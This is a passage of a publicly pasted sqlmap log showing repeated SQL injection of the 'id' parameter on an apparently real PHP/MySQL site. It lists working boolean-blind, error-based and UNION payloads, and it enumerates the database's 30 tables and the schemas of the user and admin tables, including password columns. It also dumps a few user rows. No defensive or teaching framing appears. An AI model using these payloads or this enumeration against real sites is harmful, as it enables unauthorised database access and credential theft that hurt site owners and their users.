  609. back-end DBMS: MySQL 5.0
  610. Database: efnypvon_icd_db
  611. Table: icd_users
  612. [18 columns]
  613. +----------------------+---------------+
  614. | Column | Type |
  615. +----------------------+---------------+
  616. | address | text |
  617. | city | varchar(255) |
  618. | company_name | varchar(255) |
  619. | country | varchar(255) |
  620. | credit_for_net | varchar(255) |
  621. | display_order | int(11) |
  622. | first_name | varchar(255) |
  623. | is_credit_customer | enum('0','1') |
  624. | join_date | date |
  625. | last_name | varchar(255) |
  626. | newsletter_subscribe | enum('0','1') |
  627. | post_code | varchar(255) |
  628. | province_state | varchar(255) |
  629. | telephone | varchar(255) |
  630. | user_email | varchar(255) |
  631. | user_id | int(11) |
  632. | user_password | varchar(255) |
  633. | user_status | tinyint(4) |
  634. +----------------------+---------------+
  635.  
  636. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  637. ---
  638. Place: GET
  639. Parameter: id
  640. Type: boolean-based blind
  641. Title: AND boolean-based blind - WHERE or HAVING clause
  642. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  643.  
  644. Type: error-based
  645. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  646. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  647.  
  648. Type: UNION query
  649. Title: MySQL UNION query (NULL) - 16 columns
  650. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  651. ---
  652. web application technology: PHP 5.3.29
  653. back-end DBMS: MySQL 5.0
  654. Database: efnypvon_icd_db
  655. Table: icd_users
  656. [3 entries]
  657. +----------------+-----------+----------------+
  658. | country | last_name | credit_for_net |
  659. +----------------+-----------+----------------+
  660. | United Kingdom | Cochin | <blank> |
  661. | US | save | <blank> |
  662. | 4 | lname | 8 |
  663. +----------------+-----------+----------------+
  664.  
  665. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  666. ---
  667. Place: GET
  668. Parameter: id
  669. Type: boolean-based blind
  670. Title: AND boolean-based blind - WHERE or HAVING clause
  671. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  672.  
  673. Type: error-based
  674. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  675. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  676.  
  677. Type: UNION query
  678. Title: MySQL UNION query (NULL) - 16 columns
  679. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  680. ---
  681. web application technology: PHP 5.3.29
  682. back-end DBMS: MySQL 5.0
  683. Database: efnypvon_icd_db
  684. Table: icd_users
  685. [18 columns]
  686. +----------------------+---------------+
  687. | Column | Type |
  688. +----------------------+---------------+
  689. | address | text |
  690. | city | varchar(255) |
  691. | company_name | varchar(255) |
  692. | country | varchar(255) |
  693. | credit_for_net | varchar(255) |
  694. | display_order | int(11) |
  695. | first_name | varchar(255) |
  696. | is_credit_customer | enum('0','1') |
  697. | join_date | date |
  698. | last_name | varchar(255) |
  699. | newsletter_subscribe | enum('0','1') |
  700. | post_code | varchar(255) |
  701. | province_state | varchar(255) |
  702. | telephone | varchar(255) |
  703. | user_email | varchar(255) |
  704. | user_id | int(11) |
  705. | user_password | varchar(255) |
  706. | user_status | tinyint(4) |
  707. +----------------------+---------------+
  708.  
  709. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  710. ---
  711. Place: GET
  712. Parameter: id
  713. Type: boolean-based blind
  714. Title: AND boolean-based blind - WHERE or HAVING clause
  715. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  716.  
  717. Type: error-based
  718. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  719. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  720.  
  721. Type: UNION query
  722. Title: MySQL UNION query (NULL) - 16 columns
  723. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  724. ---
  725. web application technology: PHP 5.3.29
  726. back-end DBMS: MySQL 5.0
  727. Database: efnypvon_icd_db
  728. [30 tables]
  729. +----------------------------+
  730. | icd_addresses |
  731. | icd_basic_pages |
  732. | icd_category |
  733. | icd_contactus_entries |
  734. | icd_courses |
  735. | icd_download_category |
  736. | icd_events |
  737. | icd_faqs |
  738. | icd_featured_ads |
  739. | icd_footer_info |
  740. | icd_gallery_images |
  741. | icd_header_info |
  742. | icd_home_welcome |
  743. | icd_homepage_banner |
  744. | icd_media_coverage_videos |
  745. | icd_members |
  746. | icd_membership |
  747. | icd_online_enquiries |
  748. | icd_practitioner_directory |
  749. | icd_quick_links |
  750. | icd_social_media |
  751. | icd_tbl_admin |
  752. | icd_tbl_country |
  753. | icd_tbl_mysql_code |
  754. | icd_tbl_subscribers |
  755. | icd_tbl_templates |
  756. | icd_testimonials |
  757. | icd_upload_files |
  758. | icd_users |
  759. | icd_videos |
  760. +----------------------------+
  761.  
  762. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  763. ---
  764. Place: GET
  765. Parameter: id
  766. Type: boolean-based blind
  767. Title: AND boolean-based blind - WHERE or HAVING clause
  768. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  769.  
  770. Type: error-based
  771. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  772. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  773.  
  774. Type: UNION query
  775. Title: MySQL UNION query (NULL) - 16 columns
  776. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  777. ---
  778. web application technology: PHP 5.3.29
  779. back-end DBMS: MySQL 5.0
  780. Database: efnypvon_icd_db
  781. Table: icd_tbl_mysql_code
  782. [3 columns]
  783. +--------------+--------------+
  784. | Column | Type |
  785. +--------------+--------------+
  786. | fErrorDetail | varchar(100) |
  787. | fErrorID | int(11) |
  788. | fErrorNumber | varchar(20) |
  789. +--------------+--------------+
  790.  
  791. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  792. ---
  793. Place: GET
  794. Parameter: id
  795. Type: boolean-based blind
  796. Title: AND boolean-based blind - WHERE or HAVING clause
  797. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  798.  
  799. Type: error-based
  800. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  801. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  802.  
  803. Type: UNION query
  804. Title: MySQL UNION query (NULL) - 16 columns
  805. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  806. ---
  807. web application technology: PHP 5.3.29
  808. back-end DBMS: MySQL 5.0
  809. Database: efnypvon_icd_db
  810. [30 tables]
  811. +----------------------------+
  812. | icd_addresses |
  813. | icd_basic_pages |
  814. | icd_category |
  815. | icd_contactus_entries |
  816. | icd_courses |
  817. | icd_download_category |
  818. | icd_events |
  819. | icd_faqs |
  820. | icd_featured_ads |
  821. | icd_footer_info |
  822. | icd_gallery_images |
  823. | icd_header_info |
  824. | icd_home_welcome |
  825. | icd_homepage_banner |
  826. | icd_media_coverage_videos |
  827. | icd_members |
  828. | icd_membership |
  829. | icd_online_enquiries |
  830. | icd_practitioner_directory |
  831. | icd_quick_links |
  832. | icd_social_media |
  833. | icd_tbl_admin |
  834. | icd_tbl_country |
  835. | icd_tbl_mysql_code |
  836. | icd_tbl_subscribers |
  837. | icd_tbl_templates |
  838. | icd_testimonials |
  839. | icd_upload_files |
  840. | icd_users |
  841. | icd_videos |
  842. +----------------------------+
  843.  
  844. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  845. ---
  846. Place: GET
  847. Parameter: id
  848. Type: boolean-based blind
  849. Title: AND boolean-based blind - WHERE or HAVING clause
  850. Payload: id=16' AND 2021=2021 AND 'RmLb'='RmLb
  851.  
  852. Type: error-based
  853. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  854. Payload: id=16' AND (SELECT 2160 FROM(SELECT COUNT(*),CONCAT(0x7165616e71,(SELECT (CASE WHEN (2160=2160) THEN 1 ELSE 0 END)),0x7169717271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yfoq'='yfoq
  855.  
  856. Type: UNION query
  857. Title: MySQL UNION query (NULL) - 16 columns
  858. Payload: id=-4545' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165616e71,0x4c7a6a4f546549765745,0x7169717271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  859. ---
  860. web application technology: PHP 5.3.29
  861. back-end DBMS: MySQL 5.0
  862. Database: efnypvon_icd_db
  863. Table: icd_tbl_admin
  864. [8 columns]
  865. +---------------------------+---------------+
  866. | Column | Type |
  867. +---------------------------+---------------+
  868. | fEmail | varchar(255) |
  869. | fPassword | varchar(255) |
  870. | fStatus | tinyint(2) |
  871. | fUserID | int(11) |
  872. | fUserName | varchar(20) |
  873. | last_login | datetime |
  874. | super_admin | enum('0','1') |
  875. | user_reply_email_contents | text |
  876. +---------------------------+---------------+
Add Comment
Please, Sign In to add comment